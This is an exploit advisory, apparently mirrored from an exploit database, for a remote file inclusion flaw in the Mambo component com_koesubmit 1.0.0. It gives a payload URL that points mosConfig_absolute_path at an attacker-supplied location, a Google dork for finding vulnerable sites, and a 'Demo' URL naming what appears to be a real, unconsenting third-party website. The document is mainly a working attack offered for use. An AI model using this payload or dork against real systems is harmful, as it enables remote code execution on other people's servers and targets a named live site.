Mambo com_koesubmit 1.0.0 Remote File Inclusion

2009-10-18T00:00:00
ID 1337DAY-ID-9924
Type zdt
Reporter Don Tukulesto
Modified 2009-10-18T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ===============================================
Mambo com_koesubmit 1.0.0 Remote File Inclusion
===============================================

#############################################################################################################
## Mambo com_koesubmit 1.0.0 Remote File Inclusion                                 ##
## Author   : Don Tukulesto                         ##
## Homepage : http://www.indonesiancoder.com                                           ##
## Date     : Friday, Semptember 18, 2009                                      ##
## ------------------------------------------------------------------------------------------------------- ##
## _______            __                              __                 ______            __              ##
##|_     _|.-----..--|  |.-----..-----..-----..-----.|__|.---.-..-----. |      |.-----..--|  |.-----..----.##
## _|   |_ |     ||  _  ||  _  ||     ||  -__||__ --||  ||  _  ||     | |   ---||  _  ||  _  ||  -__||   _|##
##|_______||__|__||_____||_____||__|__||_____||_____||__||___._||__|__| |______||_____||_____||_____||__|  ##
##                                                     ##
## ------------------------------------------------------------------------------------------------------- ##
#############################################################################################################
 
[ Software Information ]
 
[+] Software      : K?hn 1st-Submit ( com_koesubmit )
[+] Version   : 1.0
[+] Vendor    : www.alibasta.de
[+] Vulnerability : Remote File Inclusion
[+] Google Dork   : inurl:"com_koesubmit"
 
#############################################################################################################
[ ExPL0!T ]
 
http://127.0.0.1/components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=attacker?
 
 
[ Demo ]
 
http://www.mielenz-ctg.de/components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=
#############################################################################################################



#  0day.today [2018-02-20]  #